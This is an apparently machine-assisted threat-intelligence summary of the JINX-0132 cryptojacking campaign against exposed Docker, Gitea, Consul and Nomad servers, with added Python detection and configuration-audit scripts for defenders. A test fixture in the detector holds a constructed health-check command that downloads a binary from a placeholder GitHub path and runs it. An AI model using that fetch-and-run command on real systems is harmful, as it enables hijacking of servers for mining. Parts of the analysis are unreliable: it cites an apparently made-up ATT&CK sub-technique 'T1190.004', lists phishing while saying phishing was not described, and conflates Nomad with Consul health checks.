Full Report
Cybersecurity researchers have discovered a new cryptojacking campaign that's targeting publicly accessible DevOps web servers such as those associated with Docker, Gitea, and HashiCorp Consul and Nomad to illicitly mine cryptocurrencies. Cloud security firm Wiz, which is tracking the activity under the name JINX-0132, said the attackers are exploiting a wide range of known misconfigurations and
Analysis Summary
# Tool/Technique: JINX-0132 Cryptojacking Campaign
## Overview
JINX-0132 is a cryptojacking campaign discovered by Wiz that targets publicly accessible DevOps web servers (such as those related to Docker, Gitea, and HashiCorp Consul/Nomad) to illicitly mine cryptocurrencies. A distinguishing feature of this campaign is the reliance on downloading necessary tools directly from public GitHub repositories, rather than using attacker-controlled infrastructure, likely to obscure attribution. Critically, this campaign represents the first publicly documented instance of HashiCorp Nomad misconfigurations being exploited in the wild as an attack vector.
## Technical Details
- Type: Malware Campaign / Exploitation Chain
- Platform: Linux/Containerized Environments (targeting Docker, Gitea, HashiCorp services)
- Capabilities: Initial compromise via misconfigurations/vulnerabilities, remote code execution (RCE), payload delivery (cryptominer), sustained cryptomining operations.
- First Seen: Tracking observed around late May/early June 2025.
## MITRE ATT&CK Mapping
This campaign utilizes multiple techniques across the initial access, execution, and persistence tactics:
- [T1190 - Exploit Public-Facing Application]
- [T1190.004 - Exploit Public-Facing Application: Exploit Gitea Vulnerability]
- [T1059 - Command and Scripting Interpreter] (Used heavily via Consul health checks and Docker API execution)
- [T1059.004 - Command and Scripting Interpreter: Unix Shell]
- [T1021 - Remote Services] (Via exposed APIs/services)
- [T1566 - Phishing] (not described in the report; the context instead points to exposed services and misconfigurations as the initial access route)
- *Note: Initial access appears to be driven by scanning for exposed services rather than by traditional phishing.*
## Functionality
### Core Capabilities
- **Targeting DevOps Infrastructure:** Focuses specifically on exploiting misconfigurations or vulnerabilities in popular DevOps tools: Docker, Gitea, HashiCorp Consul, and HashiCorp Nomad.
- **Payload Delivery:** Downloads and executes the XMRig cryptomining payload directly from GitHub repositories.
- **Resource Hijacking:** Aims to compromise Nomad instances managing hundreds of clients to leverage significant combined CPU and RAM resources for mining.
### Advanced Features
- **Abuse of HashiCorp Nomad:** Abusing the ability to register services and define health checks on improperly configured Nomad systems. Attackers register malicious services whose health checks execute a bash command that downloads and runs the miner.
- **Gitea RCE Vector:** Exploiting Gitea versions (e.g., 1.4.0) in which an attacker with a user account that can create git hooks, or an instance where the `INSTALL_LOCK` setting is disabled, can achieve RCE.
- **Docker API Abuse:** Leveraging endpoints like `/containers/create` and `/containers/{id}/start` to spin up containers that mount the host filesystem or run mining images.
- **Attribution Avoidance:** Using off-the-shelf tools sourced directly from GitHub instead of attacker-controlled infrastructure.
## Indicators of Compromise
*Indicators below are inferred from the documented exploitation vectors; the source text lists no specific IOCs.*
- File Hashes: [Not explicitly listed in the article summary]
- File Names: [Cryptominer payload name likely includes artifacts related to **XMRig**]
- Registry Keys: [Not applicable/Not listed]
- Network Indicators: [C2 infrastructure is likely abstracted by using GitHub for downloads, but outbound traffic to mining pools is expected]
- Behavioral Indicators:
  - Attempts to create or modify service definitions within HashiCorp Nomad configurations to execute arbitrary commands upon health checks.
  - Docker API calls (`/containers/create`, `/containers/{id}/start`) executed by external or unauthorized processes.
  - Execution of shell commands attempting to download binaries from `github.com` repositories onto target servers.
## Associated Threat Actors
- **JINX-0132 Group** (Name assigned by Wiz for tracking this specific campaign).
## Detection Methods
- [Signature-based detection: Signature needed for the specific XMRig payloads distributed.]
- [Behavioral detection: Monitoring for legitimate DevOps APIs (Docker, Nomad) being used outside of expected administrative workflows to launch shell processes or container creation.]
- [YARA rules if available: No explicit YARA rules provided in the summary.]
- **Specific Service Configuration Checks:** Auditing Nomad configurations for services registered by unauthorized users that include bash commands in health checks.
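The following script is an added example, not code from the Wiz report or from any of the projects named above; it turns the behavioral indicators and detection methods listed here into two checks that run over constructed sample data. It assumes a reverse proxy (or the daemons' own request logging) in front of the Docker and Consul HTTP APIs writes combined-style access lines, that administrative traffic comes from a known range (`10.0.0.0/8` here, an assumption), and that service registrations are available as JSON bodies in the shape the Consul agent API accepts (script checks carry their command in `Args`). The IP addresses, timestamps, container id and GitHub path are constructed placeholders.

```python
"""Detection helpers for the JINX-0132 behaviours listed above.

Added example with constructed inputs; nothing here is a real capture.
"""
import json
import re
from ipaddress import ip_address, ip_network

# Constructed access-log lines from a proxy fronting the Docker API (versioned
# /v1.43/... paths) and the Consul agent HTTP API.
ACCESS_LOG = """\
203.0.113.7 - - [02/Jun/2025:10:14:02 +0000] "POST /v1.43/containers/create HTTP/1.1" 201 90
203.0.113.7 - - [02/Jun/2025:10:14:03 +0000] "POST /v1.43/containers/3f2a9c1d7e6b/start HTTP/1.1" 204 0
10.0.0.5 - - [02/Jun/2025:10:15:11 +0000] "GET /v1.43/containers/json HTTP/1.1" 200 1024
10.0.0.5 - - [02/Jun/2025:10:16:40 +0000] "POST /v1.43/containers/create HTTP/1.1" 201 90
198.51.100.9 - - [02/Jun/2025:10:20:00 +0000] "PUT /v1/agent/service/register HTTP/1.1" 200 0
"""

# Constructed Consul-style registration whose script health check fetches a
# binary from github.com (placeholder org/repo) and runs it.
MALICIOUS_REGISTRATION = json.dumps({
    "Name": "node-exporter",
    "Check": {
        "Args": ["/bin/sh", "-c",
                 "curl -sL https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/x.tar.gz | tar xz && ./x"],
        "Interval": "30s",
    },
})
# Constructed benign registration: an HTTP check has no Args and is ignored.
BENIGN_REGISTRATION = json.dumps({
    "Name": "web",
    "Checks": [{"HTTP": "http://127.0.0.1:8080/healthz", "Interval": "10s"}],
})

ADMIN_NETS = [ip_network("10.0.0.0/8")]   # assumption: where admins and CI legitimately connect from

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# The two Docker endpoints named in the write-up, with an optional /vX.Y prefix.
DOCKER_LAUNCH_RE = re.compile(r"^(?:/v[\d.]+)?/containers/(?:create|[^/]+/start)$")
CONSUL_REGISTER = "/v1/agent/service/register"
# curl/wget invocation whose URL is on github.com, within one shell command.
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*github\.com")


def scan_access_log(log_text: str, admin_nets=ADMIN_NETS) -> list[dict]:
    """Flag container create/start and service registration from outside the admin ranges."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src = ip_address(m["ip"])
        if any(src in net for net in admin_nets):
            continue
        path, method = m["path"], m["method"]
        if method == "POST" and DOCKER_LAUNCH_RE.match(path):
            reason = "docker container launch from non-admin source"
        elif method == "PUT" and path == CONSUL_REGISTER:
            reason = "service registration from non-admin source"
        else:
            continue
        findings.append({"ip": str(src), "ts": m["ts"], "path": path, "reason": reason})
    return findings


def suspicious_checks(registration_json: str) -> list[str]:
    """Return the script health checks whose command downloads from github.com."""
    reg = json.loads(registration_json)
    checks = list(reg.get("Checks", []))
    if "Check" in reg:
        checks.append(reg["Check"])
    flagged = []
    for chk in checks:
        args = chk.get("Args") or []
        cmd = " ".join(args)
        if args and DOWNLOAD_RE.search(cmd):
            flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_LOG):
        print(finding)
    print(suspicious_checks(MALICIOUS_REGISTRATION))
    print(suspicious_checks(BENIGN_REGISTRATION))
```

Run as a script it reports the two Docker calls from 203.0.113.7 and the registration from 198.51.100.9, while the identical create call from 10.0.0.5 is treated as an administrative action; the allowlist is the weak point of this approach, so pair it with the configuration audit in the mitigation section rather than relying on source address alone.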
## Mitigation Strategies
- **API Security & Network Segmentation:** Restrict access to public-facing DevOps APIs (Docker API, Gitea/Git hooks, Consul HTTP API) only to necessary internal IP ranges or identity-aware proxies.
- **Patching and Configuration Hardening:**
  - Ensure Gitea installations have `INSTALL_LOCK=true` and apply necessary patches (mitigates CVE-2020-14144 vector).
  - Properly configure HashiCorp Consul to restrict remote users from registering services and defining arbitrary health checks.
  - Secure Docker API access or use secure alternatives (e.g., Docker Contexts, TLS).
- **Principle of Least Privilege:** Ensure any user accounts used for Gitea or other Git services do not possess permissions to create hooks or modify configurations that lead to RCE.
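The audit below is an added example, not the Wiz report's or any project's own tooling; it checks constructed copies of the three configurations this section asks to harden, each in a weak and a hardened form: Gitea's `app.ini` (`[security] INSTALL_LOCK`), the Consul agent configuration in its JSON form (`enable_script_checks`, `enable_local_script_checks`, `acl.enabled`, `acl.default_policy`), and Docker's `daemon.json` (`hosts`, `tlsverify` and the TLS file keys). The certificate paths are constructed placeholders.

```python
"""Audit the DevOps configuration settings that JINX-0132 relies on being weak.

Added example with constructed sample configurations; file contents and paths
below are not from any real deployment.
"""
import configparser
import json

# Gitea app.ini: INSTALL_LOCK=false leaves the installer page reachable.
GITEA_WEAK = "[security]\nINSTALL_LOCK = false\n"
GITEA_HARDENED = "[security]\nINSTALL_LOCK = true\n"

# Consul agent config (JSON form). Script checks plus no ACLs let any API client
# register a service whose health check runs a shell command.
CONSUL_WEAK = json.dumps({"enable_script_checks": True, "acl": {"enabled": False}})
CONSUL_HARDENED = json.dumps({
    "enable_script_checks": False,
    "enable_local_script_checks": True,   # script checks only from local config files, not the HTTP API
    "acl": {"enabled": True, "default_policy": "deny"},
})

# Docker daemon.json: a TCP listener without TLS verification is the open API.
DOCKER_WEAK = json.dumps({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})
DOCKER_HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",          # constructed paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def audit_gitea(app_ini: str) -> list[str]:
    """Report a Gitea instance whose install page is still unlocked."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(app_ini)
    if cfg.getboolean("security", "INSTALL_LOCK", fallback=False):
        return []
    return ["gitea: [security] INSTALL_LOCK is not true; the install page stays reachable"]


def audit_consul(config_json: str) -> list[str]:
    """Report script checks reachable over the HTTP API and missing deny-by-default ACLs."""
    cfg = json.loads(config_json)
    findings = []
    if cfg.get("enable_script_checks"):
        findings.append("consul: enable_script_checks=true allows script health checks via the HTTP API")
    acl = cfg.get("acl", {})
    if not acl.get("enabled") or acl.get("default_policy", "allow") != "deny":
        findings.append("consul: ACLs disabled or default_policy is not deny; service registration is unrestricted")
    return findings


def audit_docker(daemon_json: str) -> list[str]:
    """Report a TCP-exposed Docker API that does not require client certificates."""
    cfg = json.loads(daemon_json)
    tcp = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp and not cfg.get("tlsverify"):
        return [f"docker: API exposed on {', '.join(tcp)} without tlsverify"]
    return []


def audit_all(gitea_ini: str, consul_json: str, docker_json: str) -> list[str]:
    """Combine the three audits into one finding list."""
    return audit_gitea(gitea_ini) + audit_consul(consul_json) + audit_docker(docker_json)


if __name__ == "__main__":
    print("weak:", audit_all(GITEA_WEAK, CONSUL_WEAK, DOCKER_WEAK))
    print("hardened:", audit_all(GITEA_HARDENED, CONSUL_HARDENED, DOCKER_HARDENED))
```

The weak set yields four findings and the hardened set none. A Consul `default_policy` that is absent is treated as `allow`, which is the agent's default, so an ACL block that only sets `enabled: true` still gets flagged; the Docker check keys on `tlsverify` because `tls: true` alone encrypts the listener without requiring a client certificate.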
## Related Tools/Techniques
- **XMRig:** The specific cryptomining software observed being deployed.
- **Container Escape/Abuse Techniques:** Related to the exploitation of misconfigured Docker APIs.
- **Previous Docker API Cryptojacking Campaigns:** Such as the activity previously publicized by Kaspersky targeting misconfigured Docker instances.